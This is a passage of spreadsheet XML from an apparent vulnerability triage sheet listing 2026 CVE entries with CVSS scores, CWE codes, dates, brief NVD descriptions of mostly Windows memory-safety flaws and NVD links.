      <c r="K361" s="5" t="inlineStr"/>
      <c r="L361" s="5" t="inlineStr"/>
      <c r="M361" s="5" t="inlineStr"/>
      <c r="N361" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O361" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P361" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q361" s="5" t="inlineStr"/>
      <c r="R361" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S361" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86720</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86723</t>
        </is>
      </c>
      <c r="D362" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E362" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G362" s="5" t="inlineStr"/>
      <c r="H362" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I362" s="5" t="inlineStr"/>
      <c r="J362" s="5" t="inlineStr"/>
      <c r="K362" s="5" t="inlineStr"/>
      <c r="L362" s="5" t="inlineStr"/>
      <c r="M362" s="5" t="inlineStr"/>
      <c r="N362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O362" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P362" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q362" s="5" t="inlineStr"/>
      <c r="R362" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S362" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86723</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28662</t>
        </is>
      </c>
      <c r="D363" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E363" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F363" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I363" s="5" t="inlineStr"/>
      <c r="J363" s="5" t="inlineStr"/>
      <c r="K363" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L363" s="5" t="inlineStr"/>
      <c r="M363" s="5" t="inlineStr"/>
      <c r="N363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O363" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P363" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q363" s="5" t="inlineStr"/>
      <c r="R363" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="S363"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T363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28662</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55277</t>
        </is>
      </c>
      <c r="D364" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E364" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F364" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I364" s="5" t="inlineStr"/>
      <c r="J364" s="5" t="inlineStr"/>
      <c r="K364" s="5" t="inlineStr"/>
      <c r="L364" s="5" t="inlineStr"/>
      <c r="M364" s="5" t="inlineStr"/>
      <c r="N364" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O364" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P364" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q364" s="5" t="inlineStr"/>
      <c r="R364" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="S364" s="5" t="inlineStr">
        <is>
          <t>In checkUiccListenConfigNeeded of RoutingManager.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55277</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68827</t>
        </is>
      </c>
      <c r="D365" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E365" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F365" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I365" s="5" t="inlineStr"/>
      <c r="J365" s="5" t="inlineStr"/>
      <c r="K365" s="5" t="inlineStr"/>
      <c r="L365" s="5" t="inlineStr"/>
      <c r="M365" s="5" t="inlineStr"/>
      <c r="N365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O365" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P365" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q365" s="5" t="inlineStr"/>
      <c r="R365" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="S365" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows GDI+ allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68827</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68834</t>
        </is>
      </c>
      <c r="D366" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E366" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F366" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I366" s="5" t="inlineStr"/>
      <c r="J366" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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6" s="5" t="inlineStr"/>
      <c r="M366" s="5" t="inlineStr"/>
      <c r="N366" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O366" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P366" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q366" s="5" t="inlineStr"/>
      <c r="R366" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S366" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68834</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68838</t>
        </is>
      </c>
      <c r="D367" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E367" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F367" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I367" s="5" t="inlineStr"/>
      <c r="J367" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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7" s="5" t="inlineStr"/>
      <c r="M367" s="5" t="inlineStr"/>
      <c r="N367" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O367" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P367" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q367" s="5" t="inlineStr"/>
      <c r="R367" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S367" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68838</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68876</t>
        </is>
      </c>
      <c r="D368" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E368" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F368" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G368" s="5" t="inlineStr"/>
      <c r="H368" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I368" s="5" t="inlineStr"/>
      <c r="J368" s="5" t="inlineStr"/>
      <c r="K368" s="5" t="inlineStr"/>
      <c r="L368" s="5" t="inlineStr"/>
      <c r="M368" s="5" t="inlineStr"/>
      <c r="N368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O368" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P368" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q368" s="5" t="inlineStr"/>
      <c r="R368" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S368" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68876</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68878</t>
        </is>
      </c>
      <c r="D369" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E369" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F369" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G369" s="5" t="inlineStr"/>
      <c r="H369" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I369" s="5" t="inlineStr"/>
      <c r="J369" s="5" t="inlineStr"/>
      <c r="K369" s="5" t="inlineStr"/>
      <c r="L369" s="5" t="inlineStr"/>
      <c r="M369" s="5" t="inlineStr"/>
      <c r="N369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O369" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P369" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q369" s="5" t="inlineStr"/>
      <c r="R369" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S369" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Fast FAT Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68878</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68880</t>
        </is>
      </c>
      <c r="D370" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E370" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F370" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G370" s="5" t="inlineStr"/>
      <c r="H370" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I370" s="5" t="inlineStr"/>
      <c r="J370" s="5" t="inlineStr"/>
      <c r="K370" s="5" t="inlineStr"/>
      <c r="L370" s="5" t="inlineStr"/>
      <c r="M370" s="5" t="inlineStr"/>
      <c r="N370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O370" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P370" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q370" s="5" t="inlineStr"/>
      <c r="R370" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="S370" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68880</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68894</t>
        </is>
      </c>
      <c r="D371" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E371" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F371" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G371" s="5" t="inlineStr"/>
      <c r="H371" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I371" s="5" t="inlineStr"/>
      <c r="J371" s="5" t="inlineStr"/>
      <c r="K371" s="5" t="inlineStr"/>
      <c r="L371" s="5" t="inlineStr"/>
      <c r="M371" s="5" t="inlineStr"/>
      <c r="N371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O371" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P371" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q371" s="5" t="inlineStr"/>
      <c r="R371" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S371" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68894</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69271</t>
        </is>
      </c>
      <c r="D372" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E372" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F372" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I372" s="5" t="inlineStr"/>
      <c r="J372" s="5" t="inlineStr"/>
      <c r="K372" s="5" t="inlineStr"/>
      <c r="L372" s="5" t="inlineStr"/>
      <c r="M372" s="5" t="inlineStr"/>
      <c r="N372" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O372" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P372" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q372" s="5" t="inlineStr"/>
      <c r="R372" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S372" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69271</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69301</t>
        </is>
      </c>
      <c r="D373" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E373" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F373" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I373" s="5" t="inlineStr"/>
      <c r="J373" s="5" t="inlineStr"/>
      <c r="K373" s="5" t="inlineStr"/>
      <c r="L373" s="5" t="inlineStr"/>
      <c r="M373" s="5" t="inlineStr"/>
      <c r="N373" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O373" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P373" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q373" s="5" t="inlineStr"/>
      <c r="R373" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S373" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69301</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69322</t>
        </is>
      </c>
      <c r="D374" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E374" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F374" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I374" s="5" t="inlineStr"/>
      <c r="J374" s="5" t="inlineStr"/>
      <c r="K374" s="5" t="inlineStr"/>
      <c r="L374" s="5" t="inlineStr"/>
      <c r="M374" s="5" t="inlineStr"/>
      <c r="N374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O374" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P374" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q374" s="5" t="inlineStr"/>
      <c r="R374" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S374" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69322</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69332</t>
        </is>
      </c>
      <c r="D375" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E375" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F375" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I375" s="5" t="inlineStr"/>
      <c r="J375" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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5" s="5" t="inlineStr"/>
      <c r="M375" s="5" t="inlineStr"/>
      <c r="N375" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O375" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P375" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q375" s="5" t="inlineStr"/>
      <c r="R375" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S375" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69332</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69346</t>
        </is>
      </c>
      <c r="D376" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E376" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F376" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I376" s="5" t="inlineStr"/>
      <c r="J376" s="5" t="inlineStr"/>
      <c r="K376" s="5" t="inlineStr"/>
      <c r="L376" s="5" t="inlineStr"/>
      <c r="M376" s="5" t="inlineStr"/>
      <c r="N376" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O376" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P376" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q376" s="5" t="inlineStr"/>
      <c r="R376" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S376" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69346</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69365</t>
        </is>
      </c>
      <c r="D377" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E377" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F377" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I377" s="5" t="inlineStr"/>
      <c r="J377" s="5" t="inlineStr"/>
      <c r="K377" s="5" t="inlineStr"/>
      <c r="L377" s="5" t="inlineStr"/>
      <c r="M377" s="5" t="inlineStr"/>
      <c r="N377" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O377" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P377" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q377" s="5" t="inlineStr"/>
      <c r="R377" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S377" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69365</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69371</t>
        </is>
      </c>
      <c r="D378" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E378" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F378" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I378" s="5" t="inlineStr"/>
      <c r="J378" s="5" t="inlineStr"/>
      <c r="K378" s="5" t="inlineStr"/>
      <c r="L378" s="5" t="inlineStr"/>
      <c r="M378" s="5" t="inlineStr"/>
      <c r="N378" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O378" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P378" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q378" s="5" t="inlineStr"/>
      <c r="R378" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S378" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69371</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69412</t>
        </is>
      </c>
      <c r="D379" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E379" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
